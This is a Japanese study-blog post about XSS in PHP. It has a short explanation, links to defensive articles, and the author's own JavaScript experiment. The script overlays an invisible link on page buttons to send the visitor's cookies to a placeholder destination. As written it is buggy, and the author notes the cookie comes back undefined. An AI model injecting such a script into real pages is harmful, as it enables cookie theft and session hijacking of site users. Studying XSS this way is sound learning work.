ねっとぱんだ-プログラミング勉強ブログ-

Webデザイン、プログラミングの勉強ブログ。

【php】XSS

xss (xross site scripting)

スクリプトを紛れ込ませて意図しないページに遷移させたりする。
cookieを盗んでsessionハイジャックをするなど。
【PHP入門講座】 XSS攻撃への対策 - Qiita
セッション管理に対する攻撃と対策 - Qiita
クロスサイト・スクリプティング(XSS)の具体例 | Webセキュリティの小部屋

反省点

  • cookieを取得したかったのですが、undefinedになる。
  • confirm後に実行されるようにする。

コード

<script>
//クリックされそうなエレメント
var button = document.getElementsByClassName("mdl-js-button"),
//クリックさせるボタン(幅高さを被せるボタンに合わせる)
el = document.createElement("a");
el.setAttribute("href","遷移先?"+document.cookies);
el.setAttribute("style","position:absolute;top:0;left:0;display:block;z-index:999;width:100px;height:40px;cursor:pointer;");
//ボタンを設置
for(var i = 0;i < button.length;i++){
button[i].setAttribute("style","position:relative");
button[i].appendChild(el);
};
</script>